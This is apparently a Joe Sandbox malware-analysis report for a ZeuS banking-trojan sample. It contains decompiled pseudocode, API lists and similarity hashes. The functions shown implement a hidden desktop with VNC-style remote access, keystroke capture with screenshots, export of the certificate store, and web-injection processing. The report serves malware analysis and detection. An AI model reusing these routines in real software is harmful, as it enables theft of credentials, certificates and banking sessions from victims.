0x0041b8c2
0x0041b962
0x0041b966
0x0041b969
0x0041b96c
0x0041b971
0x0041b973
0x00000000
0x00000000
0x0041b979
0x0041b97e
0x0041b983
0x0041b989
0x0041b98e
0x0041b994
0x0041b99a
0x0041b99d
0x0041b9a1
0x0041b9ad
0x0041b9ad
0x0041b9b2
0x0041b9b2
0x0041b9ba
0x0041b9c0
0x0041b9c2
0x0041b9c4
0x0041b9c6
0x0041b9da
0x0041b9e3
0x0041b9e3
0x0041b9c8
0x0041b9ca
0x0041b9d3
0x0041b9d3
0x0041b9e6
0x0041b9e6
0x0041b9e6
0x0041b9ed
0x0041b9f3
0x0041b9f5
0x0041b9f7
0x0041b9f9
0x0041ba0d
0x0041ba16
0x0041ba16
0x0041b9fb
0x0041b9fd
0x0041ba06
0x0041ba06
0x0041ba19
0x0041ba19
0x0041ba19
0x0041ba1e
0x0041ba23
0x0041ba25
0x0041ba29
0x0041ba35
0x0041ba35
0x0041ba35
0x0041ba37
0x0041ba3b
0x0041ba3d
0x0041ba3d
0x0041ba43
0x0041ba43
0x0041ba4a
0x0041ba4e
0x0041ba50
0x0041ba50
0x0041ba56
0x0041ba56
0x0041ba67
0x0041ba73
0x0041ba80
0x00000000
0x0041ba80
0x0041b9a7
0x0041b9ab
0x00000000
0x00000000
0x00000000
0x0041b9ab
0x0041b8c8
0x0041b8c9
0x00000000
0x00000000
0x0041b8cf
0x0041b8d3
0x0041b8d6
0x0041b8d9
0x0041b8de
0x0041b8e0
0x00000000
0x00000000
0x0041b8e6
0x0041b8ea
0x0041b8ed
0x0041b8f0
0x0041b8f5
0x0041b8f7
0x00000000
0x00000000
0x0041b923
0x0041b92c
0x0041b92e
0x0041b930
0x0041bd24
0x00000000
0x0041bd24
0x0041b93e
0x0041b943
0x0041b945
0x00000000
0x00000000
0x0041b94e
0x0041b954
0x0041b958
0x0041b958
0x0041bc79
0x0041bc7e
0x0041bc81
0x0041bc81
0x00000000
0x0041bc89
0x0041b747

APIs

Part of subcall function 00408210: send.WS2_32(?,?,?,00000000), ref: 0040821E

WSAGetLastError.WS2_32(00000031,00000020,00000010,?,00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B7C7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B7E2
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B874
GetSystemMetrics.USER32 ref: 0041B98E

Part of subcall function 00408199: recv.WS2_32(?,?,?,00000000), ref: 004081BD

ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041BD1A

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

x, xrefs: 0041BA43
RFB , xrefs: 0041B5B2
RFB 003.003, xrefs: 0041B578
, xrefs: 0041BCBF

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: 1ae3abe96f2207b256dd30277cd02d9b4436a7a453b47732979bc9d9a17f0eb3
Instruction ID: 7f454416614020b9c9e1b356235ea1ef375a19cff9eb2dfc098aaf1db8739341
Opcode Fuzzy Hash: 1ae3abe96f2207b256dd30277cd02d9b4436a7a453b47732979bc9d9a17f0eb3
Instruction Fuzzy Hash: E932DF71A00219ABDF28DBA4D8417FE7BB5EF44344F04406EE951AB2C2DB7C9985CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9A6, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B9A6(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E0040F34A(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E0040B97E(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E0040F34A(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0040B939(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E0040B97E(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x0040b9a6
0x0040b9b1
0x0040b9b9
0x0040b9bc
0x0040b9cb
0x0040b9d1
0x0040b9d6
0x0040b9ef
0x0040b9f8
0x0040ba02
0x0040ba8d
0x0040ba90
0x0040ba96
0x0040ba9d
0x0040ba9d
0x0040ba08
0x0040ba0b
0x0040ba10
0x0040ba12
0x0040ba15
0x0040ba1f
0x0040ba1f
0x0040ba30
0x0040ba34
0x0040ba4a
0x0040ba60
0x0040ba70
0x0040ba70
0x0040ba74
0x0040ba75
0x0040ba7e
0x00000000
0x00000000
0x00000000
0x0040ba7e
0x0040ba63
0x0040ba69
0x0040ba6e
0x00000000
0x00000000
0x00000000
0x0040ba36
0x0040ba44
0x0040ba46
0x0040ba48
0x0040ba80
0x0040ba80
0x0040ba83
0x0040ba88
0x0040ba88
0x00000000
0x0040ba83
0x00000000
0x0040ba48
0x0040ba34
0x0040b9de
0x0040b9e4
0x0040b9e7
0x0040b9e9
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 0040B9CB
CreateWindowStationW.USER32 ref: 0040B9DE
GetProcessWindowStation.USER32 ref: 0040B9EF
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040BA2A
CreateDesktopW.USER32 ref: 0040BA3E
GetCurrentThreadId.KERNEL32 ref: 0040BA4A
GetThreadDesktop.USER32(00000000), ref: 0040BA51
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040BA63
CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040BA75
CloseWindowStation.USER32(?,?), ref: 0040BA90

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: 7d79f859bf9dd606d2cd85d1c4c10853cfd8804d25190d68287e57d553884509
Instruction ID: 94968e8d11cd7bbea7c38765d51d2b4a04b2f492b4fdf5cc15547d1058fe178e
Opcode Fuzzy Hash: 7d79f859bf9dd606d2cd85d1c4c10853cfd8804d25190d68287e57d553884509
Instruction Fuzzy Hash: F72130B5900258BFDF20AFB59C8899F7F7CEB09395B04407AF941B3261D7394D498BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404D51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404D51(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				void* _t35;
				intOrPtr _t38;
				WCHAR* _t44;
				MSG* _t53;
				void* _t56;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t53 = _a4;
				if(_t53 == 0 || E0041CAA4() == 0) {
					L20:
					return TranslateMessage(_t53);
				} else {
					_t25 = _t53->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t53->wParam - 0x1b;
						if(_t53->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t53->wParam, _t53->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_t32 =  &_v884;
								_push( &_v884);
								L19:
								E00404BB4(_t32, _t53, _t56);
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t53->wParam - 8;
						if(_t53->wParam != 8) {
							goto L17;
						}
						_push(0x4015f0);
						goto L19;
					}
					EnterCriticalSection(0x4223b8);
					if( *0x4223b0 > 0) {
						 *0x4223b0 =  *0x4223b0 + 0xffff;
						_t35 = 2;
						E0040F34A(_t35,  &_v864);
						_t38 = E0040E31C( &_v864, 0x1e, 0x1f4);
						_v900 = _t38;
						if(_t38 != 0) {
							E0040F34A(0,  &_v840);
							_t65 =  &_v884;
							E0040F34A(1, _t65);
							_t44 =  *0x4223a8; // 0x0
							if(_t44 != 0) {
								_t65 = _t44;
							}
							E00405ED9( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E004187FC(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423c20, GetTickCount());
						}
					}
					LeaveCriticalSection(0x4223b8);
					goto L20;
				}
			}

0x00404d57
0x00404d5e
0x00404d65
0x00404ea7
0x00404eb4
0x00404d78
0x00404d78
0x00404d80
0x00404e36
0x00404e3b
0x00000000
0x00000000
0x00404e3d
0x00404e41
0x00000000
0x00000000
0x00404e48
0x00404e4e
0x00404e50
0x00000000
0x00000000
0x00404e70
0x00404e76
0x00404e78
0x00000000
0x00000000
0x00404e7a
0x00404e7d
0x00404e8c
0x00404e96
0x00404e96
0x00404e98
0x00404e9d
0x00404ea1
0x00404ea2
0x00404ea2
0x00000000
0x00404ea2
0x00404e8e
0x00404e8e
0x00404e94
0x00000000
0x00000000
0x00000000
0x00404e94
0x00404e7f
0x00404e83
0x00000000
0x00000000
0x00404e85
0x00000000
0x00404e85
0x00404d8b
0x00404d99
0x00404da4
0x00404db1
0x00404db2
0x00404dc1
0x00404dc6
0x00404dcc
0x00404dd4
0x00404ddb
0x00404de0
0x00404de5
0x00404dec
0x00404dee
0x00404dee
0x00404e0f
0x00404e14
0x00404e1e
0x00404e26
0x00404e26
0x00404dcc
0x00404e2e
0x00000000
0x00404e2e

APIs

TranslateMessage.USER32(?), ref: 00404EA8

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

EnterCriticalSection.KERNEL32(004223B8), ref: 00404D8B
LeaveCriticalSection.KERNEL32(004223B8), ref: 00404E2E

Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040E34E
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040E35F
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040E36C
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040E379
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040E386
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040E393
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040E3A0
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040E3AD
Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040E3F5
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040E400
Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040E412
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040E41D
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040E429
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040E436
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040E443
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040E450
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040E45D
Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040E46A

GetTickCount.KERNEL32 ref: 00404DF0
GetKeyboardState.USER32(?), ref: 00404E48
ToUnicode.USER32 ref: 00404E70

Strings

, xrefs: 00404E8E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: f3d60c0252848b96bc04d91314d3452e3f382f709f86b6276cc2b71142d8ee13
Instruction ID: f1c36725eb23df81f5d096a4e7f3a53ad00f63c72dd25c4c5539de831bcf4255
Opcode Fuzzy Hash: f3d60c0252848b96bc04d91314d3452e3f382f709f86b6276cc2b71142d8ee13
Instruction Fuzzy Hash: 2631AFB1600301ABDB20DF65DD49AAB77A8BF80310F44083BBA44F71E2D77CE85587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFE5, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004034D0), ref: 0040D000
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D01C
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040D028
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040D067
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040D097
CharLowerW.USER32 ref: 0040D0B5
GetSystemTime.KERNEL32(?), ref: 0040D0C0
CertCloseStore.CRYPT32(?,00000000), ref: 0040D149

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 13d8489a60e86b5637ab60145fc7bf5d324d6fde8ab81665ae8597e3fc872d5f
Instruction ID: a9ca8741f4bc0d47863dfe22358d7945faba45ea9f07a6df6917e6a0e2337ce6
Opcode Fuzzy Hash: 13d8489a60e86b5637ab60145fc7bf5d324d6fde8ab81665ae8597e3fc872d5f
Instruction Fuzzy Hash: 1341A771608341ABD7119FA5CD40A6BBBDCEB88348F00093FB9C4F61D0DA38D9498766

Uniqueness

Uniqueness Score: -1.00%

Function 00412174, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00412174(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E00405426(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E0040F34A(_t188,  &_v996);
											_push(_v1052);
											E00418864(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E004051E6(_t255);
										}
									} else {
										_t280 = 0x3c;
										E00405299( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E0040F34A(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E00405ED9( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E004186BA(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E004051E6(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x4233fc);
										E004051E6( *0x423414);
										_t168 = E00405644(E004051E6( *0x423418) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423414 = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423418 = E00405644(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x4233fc);
										goto L51;
									}
									E0041CD2B( &_v860, _t259, 1,  &_v996);
									if(E0040648B( &_v900,  *((intOrPtr*)(_t286 - 4)), E00405D23( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E0040554E( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E00409465(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0041149A(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00405171(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E00405222(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E00405222(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E00409E13(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E004051B6( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E00405222(E00405222(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E00405222(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E004051E6( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0041149A(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E00405D23(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E0040616A( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x0041217a
0x00412180
0x0041218a
0x00412615
0x0041261c
0x00412625
0x00412190
0x00412190
0x00412193
0x00412197
0x0041219b
0x0041219e
0x004121a3
0x004121a6
0x004121ac
0x004121ee
0x004121f1
0x004121f1
0x004121f7
0x004121fc
0x00412201
0x00412203
0x00412209
0x0041240b
0x0041240b
0x0041240e
0x00412412
0x00412427
0x004124ec
0x004124ee
0x004124f0
0x004124f8
0x004124f9
0x004124fe
0x0041250e
0x00412513
0x00412517
0x00412517
0x0041242d
0x0041242f
0x00412437
0x00412443
0x00412451
0x00412455
0x00412466
0x0041247b
0x00412483
0x0041248a
0x0041248b
0x00412495
0x0041249b
0x004124a6
0x004124ae
0x004124be
0x004124c3
0x004124d5
0x004124da
0x004124da
0x00412466
0x00412520
0x00412525
0x00412525
0x0041252a
0x00412534
0x004125c1
0x004125cd
0x004125e3
0x004125e8
0x004125f0
0x004125f9
0x004125fe
0x00000000
0x004125fe
0x00412548
0x00412566
0x00000000
0x00000000
0x0041256c
0x00412573
0x0041257a
0x0041257f
0x00412580
0x00412583
0x0041258a
0x00412595
0x004125b4
0x004125b4
0x00000000
0x0041220f
0x0041220f
0x00412274
0x00412274
0x0041227a
0x004122ad
0x004122b4
0x004122b9
0x004122bb
0x004123f9
0x00412401
0x00412211
0x00412215
0x00412218
0x0041221d
0x00412224
0x00412228
0x0041222b
0x0041222f
0x00412233
0x0041223a
0x00000000
0x0041223c
0x0041223c
0x00000000
0x0041223c
0x0041223a
0x00412407
0x00000000
0x00412407
0x004122c5
0x004122c9
0x004122cd
0x004122dd
0x004122dd
0x004122dd
0x004122cf
0x004122d3
0x004122d3
0x004122e1
0x004122ec
0x004122f0
0x004122f3
0x004122f6
0x004122fc
0x0041236e
0x00412370
0x00412384
0x00412389
0x0041238b
0x0041238d
0x00412391
0x00412393
0x004123a5
0x004123aa
0x004123aa
0x004123aa
0x004123aa
0x004123b0
0x004123c1
0x004123c6
0x004123ca
0x004123d1
0x004123dc
0x004123e1
0x004123e1
0x004123e1
0x004123e5
0x004123d3
0x004123d3
0x004123d3
0x004123e8
0x004123ec
0x004123f0
0x004123f0
0x004123f1
0x004123f5
0x004123f5
0x0041238b
0x004122fe
0x00412307
0x0041230b
0x00412310
0x00412316
0x0041231c
0x00412332
0x00412337
0x00412345
0x0041234d
0x00412354
0x0041235d
0x00412361
0x00412367
0x00412367
0x00412316
0x00000000
0x004122fc
0x0041227f
0x00412288
0x00412281
0x00412284
0x00412284
0x0041228c
0x00000000
0x00412243
0x0041225b
0x00412260
0x00412262
0x00000000
0x00000000
0x00412268
0x0041226c
0x00412270
0x00000000
0x00412270
0x00412209
0x004121ae
0x004121b5
0x004121b9
0x004121be
0x004121c1
0x004121c7
0x004121d0
0x004121d7
0x004121db
0x004121e6
0x00000000
0x004121ec
0x00412604
0x00412604
0x00412607
0x00412607
0x0041260b
0x0041260b
0x00000000
0x0041219b

APIs

InternetCrackUrlA.WININET(?,?,?,00000000), ref: 0041245D
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041247B
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-004233F0,?,?), ref: 00412595
EnterCriticalSection.KERNEL32(004233FC,-004233F0,?,?), ref: 004125C1
LeaveCriticalSection.KERNEL32(004233FC,?,?), ref: 004125FE

Strings

?*, xrefs: 004121AE

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
